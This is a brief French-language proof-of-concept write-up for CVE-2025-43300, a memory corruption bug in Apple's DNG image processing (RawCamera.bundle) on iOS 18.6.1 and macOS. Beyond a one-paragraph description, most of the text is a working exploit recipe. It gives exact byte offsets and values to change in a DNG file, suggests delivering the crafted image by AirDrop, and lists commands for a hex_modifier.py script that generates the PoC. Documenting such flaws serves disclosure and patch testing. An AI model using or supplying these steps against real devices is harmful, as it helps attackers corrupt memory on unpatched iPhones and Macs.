
CVE-2025-43300 : Corruption de mémoire lors du traitement d'images DNG sur iOS/macOS
CVE-2025-43300: Corruption mémoire du traitement d'image DNG sur iOS/macOS
Une vulnérabilité dans le traitement d'image d'Apple (RawCamera.bundle) affecte iOS 18.6.1 et macOS. Le problème survient lorsque les fichiers DNG contiennent des métadonnées TIFF et des paramètres JPEG Lossless incohérents, entraînant une corruption mémoire.
Téléchargez l'image au format DNG
Modifiez les octets suivants :
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
Airdrop, etc.
# Create POC using known vulnerable offsets
python3 hex_modifier.py create-poc <input.dng>
# Manual byte modification
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generate diff report
python3 hex_modifier.py diff <original.dng> <modified.dng>